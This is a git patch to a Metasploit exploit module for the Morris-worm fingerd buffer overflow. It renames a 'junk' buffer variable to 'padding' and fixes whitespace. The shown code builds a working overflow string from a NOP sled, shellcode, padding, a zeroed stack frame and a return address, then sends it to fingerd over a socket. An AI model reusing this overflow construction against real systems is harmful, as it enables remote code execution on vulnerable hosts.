From 8a402da056f99d0c3b69edb6ca7c76a609af7468 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 22 Nov 2018 23:10:57 -0600
Subject: [PATCH] Explain "junk" in buffer for morris_fingerd_bof

And unrelated whitespace changes because I suck.
---
 modules/exploits/bsd/finger/morris_fingerd_bof.rb | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/bsd/finger/morris_fingerd_bof.rb b/modules/exploits/bsd/finger/morris_fingerd_bof.rb
index 6366a64c54..02101309c5 100644
--- a/modules/exploits/bsd/finger/morris_fingerd_bof.rb
+++ b/modules/exploits/bsd/finger/morris_fingerd_bof.rb
@@ -85,24 +85,23 @@ class MetasploitModule < Msf::Exploit::Remote
 # 0x01 is NOP in VAX-speak
 nops = "\x01" * (target.payload_space - shellcode.length)
- # This overwrites part of the buffer
- junk = rand_text_alphanumeric(109)
+ # This pads past buffer corruption
+ padding = rand_text_alphanumeric(109)
 # This zeroes out part of the stack frame
 frame = "\x00" * 16
 # Finally, pack in our return address
- ret = [target.ret].pack('V') # V is for VAX!
+ ret = [target.ret].pack('V') # V is for VAX!
 # The newline is for gets(3)
- sploit = nops + shellcode + junk + frame + ret + "\n"
+ sploit = nops + shellcode + padding + frame + ret + "\n"
 # Fire away
 print_status('Connecting to fingerd')
 connect
 print_status("Sending #{sploit.length}-byte buffer")
 sock.put(sploit)
- # Hat tip @bcoles
 rescue Rex::ConnectionError => e
 fail_with(Failure::Unreachable, e.message)